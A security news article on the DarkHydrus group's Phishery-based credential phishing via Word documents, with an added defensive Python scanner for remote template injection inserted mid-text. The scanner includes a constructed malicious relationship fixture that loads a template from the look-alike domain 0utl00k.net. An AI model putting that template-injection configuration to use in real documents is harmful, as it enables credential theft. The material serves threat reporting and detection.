A threat actor that is relatively new to the scene relies on open-source tools for spear-phishing attacks designed to steal credentials from government and educational institutions in the Middle East.
The group is being tracked as DarkHydrus by researchers at Palo Alto Networks Unit 42, who observed it using Phishery in a recent credential harvesting attack. Previous campaigns utilized Meterpreter, Cobalt Strike, Invoke-Obfuscation, Mimikatz, PowerShellEmpire, and Veil. The typical method employed is to weaponize Office documents that retrieve malicious code from a remote site when opened.
In an attack in June, DarkHydrus targeted an educational entity with an email carrying the subject line “Project Offer” and a Word document as the attachment. Once the Word document was launched, it prompted the user to enter their username and password in an authentication prompt. If they did that, the credentials would be sent directly to the malicious actor's command and control server.
All this would seem legitimate for an unwitting person, especially since the dialog box showed a connection to a fairly familiar domain.
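The article does not spell out how the document produces the login prompt, so as an added example (not code from the article, from Unit 42, or from the Phishery project) here is a small Python scanner written from a defender's side. It assumes the publicly documented Phishery mechanism: the .docx carries an external attachedTemplate relationship in one of its `.rels` parts, Word fetches that template over HTTP(S) when the file opens, and a 401 challenge from the remote server is what surfaces the credential dialog. The scanner never fetches anything; it only unpacks the document, lists relationships marked `TargetMode="External"`, flags remote attached templates, and checks the host for digit-for-letter look-alikes of watched brand labels (the `0utl00k` for `outlook` pattern the researchers describe). The two relationship fragments, the placeholder template path, and the `WATCHED_LABELS` list are constructed for this example; only the 0utl00k[.]net domain comes from the article.

```python
"""Flag Word documents that load an attached template from an external host.

Added example; not part of the article or of Unit 42's tooling.  Assumes the
publicly documented Phishery technique: an external attachedTemplate relationship
(usually in word/_rels/settings.xml.rels) makes Word fetch the template over
HTTP(S), and a 401 challenge from that host produces the login prompt.
"""
import sys
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"

# Digits commonly swapped for letters in look-alike domains (0utl00k -> outlook).
HOMOGLYPHS = str.maketrans({"0": "o", "1": "l", "3": "e", "5": "s", "7": "t"})

# Constructed watch list; extend it with the labels of your own organisation's domains.
WATCHED_LABELS = ("outlook", "microsoft", "office", "sharepoint")


def external_rels(rels_xml):
    """Return (relationship type, target) for every TargetMode="External" entry."""
    data = rels_xml.encode("utf-8") if isinstance(rels_xml, str) else rels_xml
    root = ET.fromstring(data)
    found = []
    for rel in root.iter(f"{{{REL_NS}}}Relationship"):
        if rel.get("TargetMode", "Internal").lower() == "external":
            found.append((rel.get("Type", ""), rel.get("Target", "")))
    return found


def lookalike_of(host, labels=WATCHED_LABELS):
    """Return the watched label that a hostname label imitates via digit homoglyphs, else None."""
    for label in host.lower().split("."):
        normalised = label.translate(HOMOGLYPHS)
        if normalised in labels and normalised != label:
            return normalised
    return None


def assess_rels(rels_xml, labels=WATCHED_LABELS):
    """Assess one .rels part; returns a list of findings (empty means nothing suspicious)."""
    findings = []
    for rtype, target in external_rels(rels_xml):
        kind = rtype.rsplit("/", 1)[-1]  # e.g. attachedTemplate, hyperlink, oleObject
        host = (urlparse(target).hostname or "").lower()
        reasons = []
        if kind == "attachedTemplate":
            reasons.append("template is loaded from a remote host when the document opens")
        imitated = lookalike_of(host, labels)
        if imitated:
            reasons.append(f"host '{host}' imitates '{imitated}'")
        if reasons:
            findings.append({"kind": kind, "target": target, "host": host, "reasons": reasons})
    return findings


def scan_docx(path, labels=WATCHED_LABELS):
    """Walk every relationship part inside a .docx and collect findings per part."""
    results = {}
    with zipfile.ZipFile(path) as z:
        for name in z.namelist():
            if name.endswith(".rels"):
                hits = assess_rels(z.read(name), labels)
                if hits:
                    results[name] = hits
    return results


# Constructed fixtures, not taken from a real sample.  The domain 0utl00k.net is the one
# named in the article; the template path is a placeholder.
MALICIOUS_RELS = (
    f'<Relationships xmlns="{REL_NS}">'
    '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/'
    'relationships/attachedTemplate" Target="https://0utl00k.net/template.dotm" '
    'TargetMode="External"/></Relationships>'
)
BENIGN_RELS = (
    f'<Relationships xmlns="{REL_NS}">'
    '<Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/'
    'relationships/hyperlink" Target="https://www.microsoft.com/" TargetMode="External"/>'
    '</Relationships>'
)

if __name__ == "__main__":
    if len(sys.argv) > 1:  # usage: python scan_template.py suspicious.docx
        for part, hits in scan_docx(sys.argv[1]).items():
            for h in hits:
                print(part, h["kind"], h["target"], "; ".join(h["reasons"]))
    else:
        print(assess_rels(MALICIOUS_RELS))
        print(assess_rels(BENIGN_RELS))
```

Ordinary hyperlinks are also external relationships, so the scanner reports them only when the host looks like a brand imitation; an external attached template is reported unconditionally, because a document that needs a remote server to render is the signal worth reviewing regardless of where it points. Running the scanner against an attachment gateway's quarantine, together with blocking outbound WebDAV and HTTP authentication from Office processes, gives a defender coverage for this vector without relying on the user noticing a convincing dialog box.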
"Firstly, the redacted subdomain was the domain of the targeted educational institution," the researchers say. "Also, the 0utl00k[.]net domain resembles Microsoft’s legitimate 'outlook.com' domain that provides free email services, which also makes the user less suspicious and more likely to enter their credentials."
While the document used in this attack was empty and may raise suspicions, it is not the first time the group has employed this technique. In late 2017, two different Word files using the same domain caught the attention of experts. Both of them showed content relevant to the target; one was an employee survey and the other a password handover form.
Abusing legitimate tools is not a new direction for threat actors. The rapid propagation of last year’s WannaCry and NotPetya was due to Mimikatz, which was used to retrieve passwords, and PsExec, which was used for remote execution of commands on the affected systems.
If nothing else, using readily available utilities has turned into something of a trend. The infamous FIN7 bank-robbing group built their custom malware with Cobalt Strike threat emulation software.
The SamSam crew operates with legitimate software and services, either already present on the victim systems or publicly available. RDP (Remote Desktop Protocol) for off-site connections and Hyena for remote administration of servers and workstations are just two of the tools the cybercriminals employ.
Similarly, Leafminer relies on penetration testing software and public research to find emails, credentials, files and databases on compromised systems in the Middle East.